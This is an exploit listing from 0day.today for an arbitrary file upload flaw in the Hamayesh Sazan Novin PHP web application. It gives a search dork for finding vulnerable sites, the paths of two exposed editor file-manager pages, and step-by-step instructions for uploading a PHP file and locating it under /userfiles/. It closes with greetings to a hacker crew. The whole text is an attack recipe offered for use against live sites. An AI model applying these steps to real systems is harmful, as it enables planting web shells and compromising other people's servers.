Hamayesh Sazan Novin Arbitrary File Upload Vulnerability

2011-03-21T00:00:00
ID 1337DAY-ID-15653
Type zdt
Reporter n/a
Modified 2011-03-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"" Exploit title : Hamayesh Sazan Novin Arbitrary File Upload Vulnerability
"" Date : 03/20/2011
"" Author : xConsoLe`
"" Home : www.tak3down.com
"" Contact : Yahoo ID : baheuw
"" Vendor or soft link : http://www.hamayeshsazan.com
"" Version : All versions
"" Category : Webapps
"" d0rk : inurl:enindex.php?m_id=
"" Tested on : Windows XP SP3
""""""""""""""""""""""""""""""
"""""""""""""""""""""""""""""""""""""""""

[ - ] Exploit(s) : 

[ 1 ] /editor/filemanager/connectors/uploadtest.html

[ 2 ] /editor/filemanager/browser/default/browser.html

                                                                 """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

[ - ] How To ? 

[ - ] Go to site : www.site.com/enindex.php?m_id=X

[ - ] Then , Change URL To : 

www.site.com/editor/filemanager/connectors/uploadtest.html

Select PHP & Uplaod Your File !

[ - ] Or :

www.site.com/editor/filemanager/browser/default/browser.html

And Uplaod Your File .

File Will Be Found Here :

www.site.com/userfiles/YourFile.ext  .

                                                                 """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 

In Memory of The Mother of my Friend who's dead today ..  
Rest
In
Peace  . Lah irahmek ..

Greetz : Ukn0wnv1rus , J|nX , Prosperous , Sweetboy , Niyola , alb0wz , Crashy , Mufleh , And All Algerian Hackers ..

Peace ..


#  0day.today [2018-01-10]  #